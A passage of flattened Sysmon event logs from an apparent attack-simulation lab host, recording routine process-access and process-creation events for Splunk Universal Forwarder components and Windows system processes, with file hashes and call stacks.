Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980222Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:28.753{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8C64-6151-F679-00000000FD01}3172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980221Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:28.753{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980220Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:28.753{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980219Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:28.753{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980218Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:28.753{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980217Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:28.753{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980216Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:28.753{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980215Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:28.753{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980214Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:28.753{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980213Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:28.753{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980212Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:28.753{69CF5F33-7F27-614D-0500-00000000FD01}408424C:\Windows\system32\csrss.exe{69CF5F33-8C64-6151-F679-00000000FD01}3172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000980211Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:28.753{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8C64-6151-F679-00000000FD01}3172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000980210Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:28.738{69CF5F33-8C64-6151-F679-00000000FD01}3172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000980209Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:28.503{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8ADF9EF153F848D7E3DAED8BF8130F41,SHA256=9D9E2393846AB19AECD46823825A088F7E46D5B031A7BB745040102C8669EE28,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000980208Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:28.128{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8C64-6151-F579-00000000FD01}3176C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980207Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:28.128{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980206Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:28.128{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980205Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:28.128{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980204Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:28.128{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980203Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:28.128{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980202Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:28.128{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980201Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:28.128{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980200Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:28.128{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980199Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:28.128{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980198Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:28.128{69CF5F33-7F27-614D-0500-00000000FD01}408984C:\Windows\system32\csrss.exe{69CF5F33-8C64-6151-F579-00000000FD01}3176C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000980197Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:28.128{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8C64-6151-F579-00000000FD01}3176C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000980196Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:28.116{69CF5F33-8C64-6151-F579-00000000FD01}3176C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program 